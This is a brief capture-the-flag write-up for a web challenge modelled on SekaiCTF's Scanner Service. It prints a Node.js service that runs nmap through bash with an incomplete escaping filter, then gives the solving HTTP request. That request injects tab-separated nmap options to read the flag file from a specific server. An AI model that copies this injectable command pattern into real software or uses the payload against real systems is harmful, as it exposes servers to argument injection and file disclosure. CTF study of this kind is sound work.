MyGO's Live!!!!!

原题是 SekaiCTF的Scanner Service

// Inspiration: SekaiCTF scanner service

const express = require('express');
const { spawn } = require('child_process');
const fs = require('fs');

const app = express();
const port = 3333;
app.use(express.static('public'));
app.get('/', (req, res) => {
  fs.readFile(__dirname + '/public/index.html', 'utf8', (err, data) => {
    if (err) {
      console.error(err);
      res.status(500).send('Internal Server Error');
    } else {
      // Send the HTML content
      res.send(data);
    }
  })
}
);
function escaped(c) {
  if (c == ' ')
    return '\\ ';
  if (c == '$')
    return '\\$';
  if (c == '`')
    return '\\`';
  if (c == '"')
    return '\\"';
  if (c == '\\')
    return '\\\\';
  if (c == '|')
    return '\\|';
  if (c == '&')
    return '\\&';
  if (c == ';')
    return '\\;';
  if (c == '<')
    return '\\<';
  if (c == '>')
    return '\\>';
  if (c == '(')
    return '\\(';
  if (c == ')')
    return '\\)';
  if (c == "'")
    return '\\\'';
  if (c == "\n")
    return '\\n';
  if (c == "*")
    return '\\*';
  else
    return c;
}
app.get('/checker', (req, res) => {
  let url = req.query.url;
  
  if (url) {
    if (url.length > 60) {
      res.send("我喜欢你");
      return;
    }
    url = [...url].map(escaped).join("");
    console.log(url);

    let host;
    let port;
    if (url.includes(":")) {
      const parts = url.split(":");
      host = parts[0];
      port = parts.slice(1).join(":");
    } else {
      host = url;
    }
    let command = "";
    // console.log(host);
    // console.log(port);

    if (port) {
      if (isNaN(parseInt(port))) {
        res.send("我喜欢你");
        return;
      }
      command = ["nmap", "-p", port, host].join(" "); // Construct the shell command
    } else {
      command = ["nmap", "-p", "80", host].join(" ");
    }

    var fdout = fs.openSync('stdout.log', 'a');
    var fderr = fs.openSync('stderr.log', 'a');
    nmap = spawn("bash", ["-c", command], {stdio: [0,fdout,fderr] } );

    nmap.on('exit', function (code) {
      console.log('child process exited with code ' + code.toString());
      if (code !== 0) {
        let data = fs.readFileSync('stderr.log');
        console.error(`Error executing command: ${data}`);
        res.send(`Error executing command!!! ${data}`);
      } else {
        let data = fs.readFileSync('stdout.log');
        console.error(`Ok: ${data}`);
        res.send(`${data}`);
      }
    });
  } else {
    res.send('No parameter provided.');
  }
});

app.listen(port, () => {
  console.log(`Server listening on port ${port}`);
});

process.on('uncaughtException', (err) => {
  console.error('Uncaught Exception:', err);
});

叫你不bantab(%09)😠

GET /checker?url=127.0.0.1%09-iL%09flag%09-oN%09-&port=80 HTTP/1.1
Host: 124.70.33.170:24000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1